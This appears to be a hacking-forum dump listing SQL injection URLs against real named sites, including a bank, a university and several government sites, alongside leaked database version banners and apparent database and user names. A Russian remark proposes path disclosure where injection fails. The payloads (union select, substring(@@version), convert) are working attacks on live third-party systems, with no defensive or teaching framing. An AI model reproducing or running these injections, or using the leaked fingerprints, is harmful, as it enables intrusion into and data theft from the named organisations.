Separate names with a comma.
Sybase ASE http://www.inthebreeze.com/index.php?action=Products&rowid=manufacturer&manuid=1+and+1=convert(integer,(select+@@version))...
Procredit bank http://www.procreditbank.ro/hr_job_details.php?id=31+and+substring(@@version,1,1)=5
PostgreSQL 8.2.9 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21):conabweb:bd_conabweb
http://www.nccu.edu.tw/news/detail.php?news_id=1+and+substring(@@version,1,1)=5
PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:sgg
http://score.dnr.sc.gov/deep.php?subject=2&topic=1+union+select+1,concat(0x2a,version(),user(),database()),3,4,5+limit+1,1/* 4.1.20...
PostgreSQL 8.1.11 on i686-pc-linux-gnu, compiled by GCC 2.96:sys_anon
http://old.dqlake.gov.cn/homepage/zwgk/zwgk_list.php?category=1+and+substring(@@version,1,1)=4
PostgreSQL 8.1.9 on i386-portbld-freebsd6.2, compiled by GCC cc (GCC) 3.4.6 [FreeBSD] 20060305:millergarden:gpp
PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14):scancomi
[email protected]_management
PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
http://www.bridesathotbobbins.co.uk/?pageid=1+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information...
скуля тут не прокатит. Раскрытие путей разве что
PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:5432:sgc